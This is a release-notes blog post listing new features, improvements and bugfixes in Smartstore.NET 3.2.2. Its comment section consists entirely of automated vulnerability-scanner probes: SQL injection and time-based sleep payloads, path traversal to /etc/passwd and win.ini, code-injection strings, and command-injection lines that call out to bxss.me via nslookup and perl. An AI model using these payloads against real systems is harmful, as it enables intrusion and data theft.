Friday, August 16, 2019
Smartstore.NET 3.2.2 is available
Highlights
New Features
- External category links: alternative links for categories in the main menu and in category listings.
- Page Builder: multistore support for stories.
- #1639 Shipping.ByTotal: Add option to calculate the shipping rate based on the net total instead of the gross total.
- #1537 Implement "Ratenzahlung powered by PayPal" provider.
- New Heidelpay payment plugin.
- Shop-Connector: mapping of product SKUs that differ between client shops.
- MegaMenu supports configuration of menu items
Improvements
- Amazon Pay: PSD2. Strong customer authentication (SCA) upgrade.
- Updated *MaxMind.GeoIP* library and country database
- Removed HTML encoding for meta tags and document title.
- #1662 Quantity Units: added field for name pluralization.
- (SEO) combined SSL and canonical host 301 redirections to prevent successive redirects.
- (SEO) Activated GZIP compression for all dynamic and static responses.
- Set max. file upload size to 2 GB (globally)
- (Dev) Added a sample block for the *Page Builder* in DevTools plugin.
- Various other minor improvements.
- PayPal PLUS: paying by instalments can be selected in payment wall.
- Payone: send more information to API (e.g. shipping address) to stay as frictionless as possible for PSD2.
- PageBuilder: Added keyboard shortcuts
- #1582 Added structured data to reviews
- BMEcat: added support for import of specification attributes
Bugfixes
- Fixed wrong XML sitemap index numbering.
- #1646 Setting ManufacturerItemsToDisplayOnHomepage to 1 will not show any manufacturer.
- #1647 All manufacturers page: link of last character missing in alphabetical letter list.
- #1664 RTL: CMS menu issues in backend.
- #1677 Page Builder: moving and resizing blocks via drag & drop didn't work correctly in RTL.
- Do not adjust inventory twice when an order is cancelled and deleted.
- #1500 Fallback to fixed VAT rate instead of rate by region for countries that are not subject to vat.
- Fixed "The entity wrapper stored in the proxy does not reference the same proxy" when copying an export profile.
- Various other minor fixes.
- BMEcat: set TaxCategoryId & MainPictureId for newly imported products
Comments (132)
Mr.
1'"
Mr.
\
Mr.
1����%2527%2522
Mr.
@@R6DNi
Mr.
JyI=
Mr.
�'�"
Mr.
�''�""
Mr.
-1 OR 2+587-587-1=0+0+0+1 --
Mr.
-1 OR 3+587-587-1=0+0+0+1 --
Mr.
-1 OR 2+141-141-1=0+0+0+1
Mr.
../../../../../../../../../../etc/passwd
Mr.
-1 OR 3+141-141-1=0+0+0+1
Mr.
-1' OR 2+673-673-1=0+0+0+1 --
Mr.
../../../../../../../../../../windows/win.ini
Mr.
-1' OR 3+673-673-1=0+0+0+1 --
Mr.
-1' OR 2+135-135-1=0+0+0+1 or 'GEk8BNGk'='
Mr.
-1' OR 3+135-135-1=0+0+0+1 or 'GEk8BNGk'='
Mr.
../
Mr.
-1" OR 2+126-126-1=0+0+0+1 --
Mr.
-1" OR 3+126-126-1=0+0+0+1 --
Mr.
${9999151+10000193}
Mr.
753'
Mr.
HttP://bxss.me/t/xss.html?%00
Mr.
./
Mr.
if(now()=sysdate(),sleep(12),0)
Mr.
bxss.me/t/xss.html?%00
Mr.
0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z
Mr.
;print(md5(31337));
Mr.
';print(md5(31337));$a='
Mr.
0"XOR(if(now()=sysdate(),sleep(12),0))XOR"Z
Mr.
)
Mr.
!(()&&!|*|*|
Mr.
^(#$!@#$)(()))******
Mr.
";print(md5(31337));$a="
Mr.
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
Mr.
-1; waitfor delay '0:0:12' --
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
-1); waitfor delay '0:0:12' --
Mr.
echo nleeht$()\ rzvyry\nz^xyu||a #' &echo nleeht$()\ rzvyry\nz^xyu||a #|" &echo nleeht$()\ rzvyry\nz^xyu||a #
Mr.
-1)); waitfor delay '0:0:12' --
Mr.
&echo gwgixl$()\ okfhoh\nz^xyu||a #' &echo gwgixl$()\ okfhoh\nz^xyu||a #|" &echo gwgixl$()\ okfhoh\nz^xyu||a #
Mr.
|echo vxclcl$()\ tqclae\nz^xyu||a #' |echo vxclcl$()\ tqclae\nz^xyu||a #|" |echo vxclcl$()\ tqclae\nz^xyu||a #
Mr.
1 waitfor delay '0:0:12' --
Mr.
(nslookup hittiwdltqbgo25ba9.bxss.me||perl -e "gethostbyname('hittiwdltqbgo25ba9.bxss.me')")
Mr.
$(nslookup hittgxnbevmzz40b02.bxss.me||perl -e "gethostbyname('hittgxnbevmzz40b02.bxss.me')")
Mr.
&(nslookup hitgzffhcrrrk47b9c.bxss.me||perl -e "gethostbyname('hitgzffhcrrrk47b9c.bxss.me')")&'\"`0&(nslookup hitgzffhcrrrk47b9c.bxss.me||perl -e "gethostbyname('hitgzffhcrrrk47b9c.bxss.me')")&`'
Mr.
|(nslookup hithiqacevltw444f5.bxss.me||perl -e "gethostbyname('hithiqacevltw444f5.bxss.me')")
Mr.
P28GQrt5'; waitfor delay '0:0:12' --
Mr.
jnZITLgx'); waitfor delay '0:0:12' --
Mr.
NAPLnJ5e')); waitfor delay '0:0:12' --
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Mr.
1some_inexistent_file_with_long_name.jpg
Mr.
-5 OR 923=(SELECT 923 FROM PG_SLEEP(12))--
Mr.
Http://bxss.me/t/fit.txt
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
-5) OR 112=(SELECT 112 FROM PG_SLEEP(12))--
Mr.
bxss.me
Mr.
`(nslookup hitlnqzzujkbqd344a.bxss.me||perl -e "gethostbyname('hitlnqzzujkbqd344a.bxss.me')")`
Mr.
;(nslookup hitqfpimsvkcz44cd2.bxss.me||perl -e "gethostbyname('hitqfpimsvkcz44cd2.bxss.me')")|(nslookup hitqfpimsvkcz44cd2.bxss.me||perl -e "gethostbyname('hitqfpimsvkcz44cd2.bxss.me')")&(nslookup hitqfpimsvkcz44cd2.bxss.me||perl -e "gethostbyname('hitqfpimsvkcz44cd2.bxss.me')")
Mr.
-1)) OR 654=(SELECT 654 FROM PG_SLEEP(12))--
Mr.
BBvQYE3a' OR 222=(SELECT 222 FROM PG_SLEEP(12))--
Mr.
yGOt8HCd') OR 976=(SELECT 976 FROM PG_SLEEP(12))--
Mr.
Q8scgU2J')) OR 32=(SELECT 32 FROM PG_SLEEP(12))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'
Mr.
smartstore-net-3-2-2-is-available
Mr.
smartstore-net-3-2-2-is-available
Mr.
smartstore-net-3-2-2-is-available/.
Mr.
'"()&%
Mr.
response.write(9313676*9039944)
Mr.
'+response.write(9313676*9039944)+'
Mr.
"+response.write(9313676*9039944)+"
Mr.
echo yqursu$()\ bhjcqo\nz^xyu||a #' &echo yqursu$()\ bhjcqo\nz^xyu||a #|" &echo yqursu$()\ bhjcqo\nz^xyu||a #
Mr.
&echo fdybyo$()\ hljwvb\nz^xyu||a #' &echo fdybyo$()\ hljwvb\nz^xyu||a #|" &echo fdybyo$()\ hljwvb\nz^xyu||a #
Mr.
|echo vudtbn$()\ upiqlz\nz^xyu||a #' |echo vudtbn$()\ upiqlz\nz^xyu||a #|" |echo vudtbn$()\ upiqlz\nz^xyu||a #
Mr.
(nslookup hitosiodoejfh047b1.bxss.me||perl -e "gethostbyname('hitosiodoejfh047b1.bxss.me')")
Mr.
$(nslookup hituqbzxtthkpdada7.bxss.me||perl -e "gethostbyname('hituqbzxtthkpdada7.bxss.me')")
Mr.
&(nslookup hitfcwildxatl28962.bxss.me||perl -e "gethostbyname('hitfcwildxatl28962.bxss.me')")&'\"`0&(nslookup hitfcwildxatl28962.bxss.me||perl -e "gethostbyname('hitfcwildxatl28962.bxss.me')")&`'
Mr.
|(nslookup hitsnjdkstextfff7d.bxss.me||perl -e "gethostbyname('hitsnjdkstextfff7d.bxss.me')")
Mr.
`(nslookup hitkdpvxunqfeae141.bxss.me||perl -e "gethostbyname('hitkdpvxunqfeae141.bxss.me')")`
Mr.
;(nslookup hitphzhbmcdxhfff8a.bxss.me||perl -e "gethostbyname('hitphzhbmcdxhfff8a.bxss.me')")|(nslookup hitphzhbmcdxhfff8a.bxss.me||perl -e "gethostbyname('hitphzhbmcdxhfff8a.bxss.me')")&(nslookup hitphzhbmcdxhfff8a.bxss.me||perl -e "gethostbyname('hitphzhbmcdxhfff8a.bxss.me')")
Mr.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Mr.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Mr.
Http://bxss.me/t/fit.txt
Mr.
'.gethostbyname(lc('hitje'.'mdvqynrq8366b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(78).chr(120).chr(65).'
Mr.
".gethostbyname(lc("hitsw"."yckeptxu71fe4.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(67).chr(111).chr(88)."
Mr.
http://bxss.me/t/fit.txt?.jpg
Mr.
/etc/shells
Mr.
c:/windows/win.ini
Mr.
bxss.me
Mr.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Mr.
';print(md5(31337));$a='
Mr.
";print(md5(31337));$a="
Mr.
-1 OR 2+890-890-1=0+0+0+1 --
Mr.
"+"A".concat(70-3).concat(22*4).concat(104).concat(72).concat(104).concat(66)+(require"socket"
Socket.gethostbyname("hitym"+"pavenzsc8254f.bxss.me.")[3].to_s)+"
Mr.
${@print(md5(31337))}
Mr.
${@print(md5(31337))}\
Mr.
'.print(md5(31337)).'
Mr.
'+'A'.concat(70-3).concat(22*4).concat(113).concat(71).concat(100).concat(72)+(require'socket'
Socket.gethostbyname('hitvf'+'qgxobuuq9a768.bxss.me.')[3].to_s)+'
Mr.
-1 OR 3+890-890-1=0+0+0+1 --
Mr.
-1 OR 2+135-135-1=0+0+0+1
Mr.
-1 OR 3+135-135-1=0+0+0+1
Mr.
-1' OR 2+597-597-1=0+0+0+1 --
Mr.
-1' OR 3+597-597-1=0+0+0+1 --
Mr.
-1' OR 2+365-365-1=0+0+0+1 or 'go5ZNVN3'='
Mr.
-1' OR 3+365-365-1=0+0+0+1 or 'go5ZNVN3'='
Mr.
-1" OR 2+446-446-1=0+0+0+1 --
Mr.
-1" OR 3+446-446-1=0+0+0+1 --
Mr.
if(now()=sysdate(),sleep(15),0)
Mr.
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Mr.
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Mr.
-1; waitfor delay '0:0:15' --
Mr.
-1); waitfor delay '0:0:15' --
Mr.
-1)); waitfor delay '0:0:15' --
Mr.
1 waitfor delay '0:0:15' --
Mr.
4Hj14dxI'; waitfor delay '0:0:15' --
Mr.
PSthXXwl'); waitfor delay '0:0:15' --
Mr.
djEZOYKB')); waitfor delay '0:0:15' --
Mr.
-5 OR 682=(SELECT 682 FROM PG_SLEEP(15))--
Mr.
-5) OR 63=(SELECT 63 FROM PG_SLEEP(15))--
Mr.
-1)) OR 41=(SELECT 41 FROM PG_SLEEP(15))--
Mr.
i4MBHRCX' OR 356=(SELECT 356 FROM PG_SLEEP(15))--
Mr.
OvkVWpsN') OR 244=(SELECT 244 FROM PG_SLEEP(15))--
Mr.
Nr0dIYms')) OR 916=(SELECT 916 FROM PG_SLEEP(15))--
Mr.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Mr.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Mr.
1'"
Mr.
1����%2527%2522
Mr.
@@g1Rfq